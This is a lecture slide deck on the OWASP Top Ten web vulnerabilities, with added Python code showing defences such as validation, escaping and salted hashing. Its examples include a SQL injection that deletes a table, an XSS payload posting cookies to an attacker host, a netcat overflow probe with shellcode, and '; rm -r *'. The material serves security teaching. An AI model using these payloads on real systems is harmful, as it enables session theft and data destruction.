the ten most critical web application security vulnerabilities


Information Networking Security and Assurance Lab, National Chung Cheng University

工業技術研究院電腦與通訊工業研究所 (Industrial Technology Research Institute, Computer & Communication Research Laboratories)

The Ten Most Critical Web Application Security Vulnerabilities

Ryan J.W Chen


Outline: OWASP Top Ten Vulnerabilities

A1 Unvalidated Input
A2 Broken Access Control
A3 Broken Authentication and Session Management
A4 Cross Site Scripting (XSS) Flaws
A5 Buffer Overflows
A6 Injection Flaws
A7 Improper Error Handling
A8 Insecure Storage
A9 Denial of Service
A10 Insecure Configuration Management


Example Web Application

[Diagram. Components: Browser, Web Server, Application Server, Database Server. Network zones: Internet, DMZ, Protected Network, Internal Network.]


Top Ten Vulnerabilities this year & last year


A1 Unvalidated Input (1/3)

An attacker can tamper with any part of an HTTP request, including the URL, query string, headers, cookies, form fields, and hidden fields.

Related attacks: A4 Cross Site Scripting, A5 Buffer Overflows, A6 Injection Flaws.


A1 Unvalidated Input (2/3)

Example (SQL injection): any malicious user can see the query string and modify it!

Original request:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34

Manipulated request:
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones

Resulting SQL. What will be done?
SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones


A1 Unvalidated Input (3/3)

Countermeasures: parameters should be validated before they are used, checking:

Data type
Allowed character set
Minimum and maximum length
Whether null is allowed
Whether the parameter is required or not
Whether duplicates are allowed
Numeric range
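
An added example (not from the slides) that applies this checklist to the phoneid parameter from the phonelist.cgi example and then binds the value as a query parameter instead of pasting it into the SQL text. The table, rows and rule values are constructed for the example; the checks use only the standard library.

```python
import re
import sqlite3

# Rules for the phoneid parameter, following the slide's checklist (data type,
# allowed character set, min/max length, null/required, numeric range).
# The duplicates rule concerns multi-valued parameters and is not exercised here.
PHONEID_RULES = {
    "required": True,
    "charset": re.compile(r"^[0-9]+$"),  # digits only: ';' and spaces are rejected
    "min_len": 1, "max_len": 6,
    "min_value": 1, "max_value": 999999,
}

def validate_phoneid(raw):
    """Return (int value, None) on success or (None, reason) naming the failed rule."""
    r = PHONEID_RULES
    if raw is None:
        return (None, "phoneid is required") if r["required"] else (None, None)
    if not r["min_len"] <= len(raw) <= r["max_len"]:
        return None, "phoneid length out of bounds"
    if not r["charset"].match(raw):
        return None, "phoneid contains characters outside [0-9]"
    value = int(raw)  # data type: integer
    if not r["min_value"] <= value <= r["max_value"]:
        return None, "phoneid outside numeric range"
    return value, None

def lookup_phone(conn, raw_phoneid):
    """Validate first, then bind the value as a query parameter so it can never
    become SQL. Returns (rows, error); on a validation error no query is run."""
    phoneid, err = validate_phoneid(raw_phoneid)
    if err:
        return [], err
    cur = conn.execute("SELECT name, phone FROM phones WHERE phoneid = ?", (phoneid,))
    return cur.fetchall(), None

def demo_db():
    """Constructed in-memory table standing in for the slide's phones table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phones (phoneid INTEGER PRIMARY KEY, name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO phones VALUES (?, ?, ?)",
                     [(34, "Ryan", "555-0134"), (35, "Alice", "555-0135")])
    return conn

def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM phones").fetchone()[0]
```

The manipulated value from the slide fails the length rule before it is ever looked at as SQL, and the table keeps both rows.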


A2 Broken Access Control

Access Control = Authorization

Typical problems:
Path traversal
File permissions that may allow access to config/password files
Client-side caching
Insecure session IDs or keys
Forced browsing past access control checks

Countermeasures: use an access control matrix to define the access control rules. Protect administrative functions behind a VPN.


A3 Broken Authentication and Session Management

Weak authentication:
Password-only
Easily guessable usernames
Unencrypted secrets that could be sniffed
Trust relationships between hosts

Countermeasures: strong passwords; account list protection; session ID protection (SSL).


A4 Cross Site Scripting (XSS) Flaws

The attacker uses a trusted application/company to deliver malicious code to the end user.

Example: a link whose query string carries a form and a script; welcome.asp reflects the name parameter into the page, and the script posts the victim's cookie to the other site ("cookie robbed!!").

<a href="http://www.insecuresite.com/welcome.asp?name=
  <FORM action=http://www.badsite.com/data.asp method=post id="idForm">
    <INPUT name="cookie" type="hidden">
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie;
    idForm.submit();
  </SCRIPT>">here</a>

Source: Bo
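
An added example (not from the slides) of the two defences a page like welcome.asp needs against this payload: encode the reflected parameter so it is shown as text rather than parsed as markup, and issue the session cookie with HttpOnly and Secure so document.cookie cannot read it and it never travels over plain HTTP (the slide's SSL point). The payload string is the slide's, constructed here only as test input; render_welcome, session_cookie_header and contains_active_markup are names chosen for this example.

```python
import html
from http.cookies import SimpleCookie

# The slide's payload, constructed here only as test input for the encoder: a form
# plus a script arriving through the 'name' parameter of welcome.asp.
SLIDE_PAYLOAD = ('<FORM action=http://www.badsite.com/data.asp method=post id="idForm">'
                 '<INPUT name="cookie" type="hidden"></FORM>'
                 '<SCRIPT>idForm.cookie.value=document.cookie;idForm.submit();</SCRIPT>')

def render_welcome(name):
    """Reflect the name parameter as text, not markup: <, >, &, ' and " are encoded,
    so the browser displays the payload instead of executing it."""
    return "<html><body><h1>Welcome, %s</h1></body></html>" % html.escape(name, quote=True)

def session_cookie_header(session_id):
    """Set-Cookie value for the session id. HttpOnly keeps document.cookie from
    reading it (which the slide's script relies on); Secure keeps it off plain HTTP,
    the slide's SSL countermeasure for session ids."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["path"] = "/"
    return c["session"].OutputString()

def contains_active_markup(page):
    """Defender-side check on rendered output: does any tag that could run code or
    post data survive in the page?"""
    lowered = page.lower()
    return any(tag in lowered for tag in ("<script", "<form", "<input", "onerror="))
```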


A5 Buffer Overflows

Mostly affects web/app servers. Goal: crash the target app and get a shell.

Example:

echo "vrfy `perl -e 'print "a" x 1000'`" | nc www.targetsystem.com 25

Replace this with something like this...

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08...";

Countermeasures: keep up with bug reports; periodically scan your website; code reviews.


A6 Injection Flaws

Allows an attacker to relay malicious code through the web application to another system.

Examples:
Path traversal: "../"
Adding more commands: "; rm -r *"
SQL injection: "' OR 1=1"

Countermeasures: avoid system calls (use libraries instead); validate input; run with limited privileges.
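
An added example (not from the slides) for the first two injection forms listed above and the "use libraries instead of system calls" countermeasure: a user-supplied path is only accepted if its normalized form stays inside a fixed document root, and a directory listing is requested either as an argument list (no shell to interpret "; rm -r *") or through os.listdir with no process at all. DOC_ROOT and the function names are chosen for this example.

```python
import os
import subprocess

# Constructed document root for the example; a deployment would point this at
# the one directory the application is allowed to serve.
DOC_ROOT = "/srv/example-docs"

def resolve_under_root(user_path, root=DOC_ROOT):
    """Join the user-supplied path to the root and require the normalized result to
    stay inside it. This rejects the slide's '../' traversal and absolute paths;
    realpath also follows symlinks, so a link pointing outside the root is caught."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise ValueError("path escapes document root: %r" % user_path)
    return candidate

def is_contained(user_path, root=DOC_ROOT):
    """Boolean form of the same check."""
    try:
        resolve_under_root(user_path, root)
        return True
    except ValueError:
        return False

def listing_argv(user_path):
    """Build the command as an argument list rather than a shell string such as
    'ls ' + user_path, where the slide's '; rm -r *' would run as a second command.
    The user value is exactly one argv element and no shell ever parses it."""
    return ["ls", "-1", "--", resolve_under_root(user_path)]

def run_listing(user_path):
    """Run the listing without shell=True; returns (exit status, lines)."""
    proc = subprocess.run(listing_argv(user_path), capture_output=True, text=True)
    return proc.returncode, proc.stdout.splitlines()

def library_listing(user_path):
    """The slide's preferred option: a library call, with no process spawned at all."""
    return sorted(os.listdir(resolve_under_root(user_path)))
```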


A7 Improper Error Handling

Helps the attacker learn how to target the application.

Example: "File not found" vs. "Access denied"

Countermeasures: code review; modify the default error pages (404, 401, etc.).
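
An added example (not from the slides) of the "File not found" vs. "Access denied" point: the client receives one status and one message in both cases, so the response does not confirm that a protected file exists, while the real reason is written to the server log under a reference id. The file set, role permissions and function names are constructed for the example.

```python
import logging
import uuid

log = logging.getLogger("app.errors")

# Constructed stand-ins for the file system and its permissions: which files exist,
# and which of them each role may read.
EXISTING_FILES = {"/docs/welcome.txt", "/docs/config.txt"}
READABLE_BY_ROLE = {
    "user": {"/docs/welcome.txt"},
    "admin": {"/docs/welcome.txt", "/docs/config.txt"},
}
GENERIC_BODY = "The requested resource is not available."

def fetch_document(role, path):
    """Internal operation: raises a different exception for the two failure reasons."""
    if path not in EXISTING_FILES:
        raise FileNotFoundError(path)
    if path not in READABLE_BY_ROLE.get(role, set()):
        raise PermissionError(path)
    return "contents of " + path

def handle_request(role, path):
    """Return (status, body, ref). Missing and forbidden files produce the same status
    and body; the actual reason goes to the server log under a reference id that an
    operator can look up. Nothing in the body distinguishes the two cases."""
    try:
        return 200, fetch_document(role, path), None
    except (FileNotFoundError, PermissionError) as exc:
        ref = uuid.uuid4().hex[:8]
        log.warning("ref=%s role=%s path=%s reason=%s", ref, role, path, type(exc).__name__)
        return 404, GENERIC_BODY, ref

def client_view(role, path):
    """What actually crosses the wire: status and body, without the log-only reason."""
    status, body, _ = handle_request(role, path)
    return status, body
```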


A8 Insecure Storage

Insecure storage of sensitive information:
Failure to encrypt critical data
Insecure storage of keys, certificates, and passwords
Improper storage of secrets in memory
Poor randomness
Poor choice of algorithm

Countermeasures: use a one-way hash function (SHA-1) instead of storing encrypted data. Make sure there are no open vulnerabilities in the cryptography.
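
The one-way-hash countermeasure as an added example (not from the slides), carried to current practice: a per-password salt from the operating system's random source (addressing the "poor randomness" item), an iterated hash (PBKDF2-HMAC-SHA256 from hashlib) rather than a bare SHA-1 digest, and a constant-time comparison on verification. The storage format and iteration count are choices made for this example.

```python
import hashlib
import hmac
import secrets

# Parameters chosen for this example: iteration count and salt length.
ITERATIONS = 600_000
SALT_BYTES = 16

def hash_password(password, salt=None):
    """One-way, salted, iterated hash. The salt comes from the OS CSPRNG and only
    algorithm, iterations, salt and digest are stored; the password itself never is.
    A caller may pass a fixed salt only to reproduce a stored value."""
    if salt is None:
        salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Recompute from the stored salt and iteration count and compare in constant time,
    so timing does not reveal how many leading bytes matched."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)
```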


A9 Denial of Service

Legitimate users can't be serviced:
Exhausting the system resources
Legitimate account lockout

Countermeasures: limit the resources allocated to any user to a bare minimum. Avoid any unnecessary access to databases or other expensive resources.


A10 Insecure Configuration Management

Developers ≠ web masters

Configuration problems:
Unpatched security flaws in the server software
Improper file and directory permissions
Default accounts with their default passwords

Countermeasures: configure all security mechanisms. Turn off all unused services. Set up and audit roles, permissions, and accounts. Logging and alerts.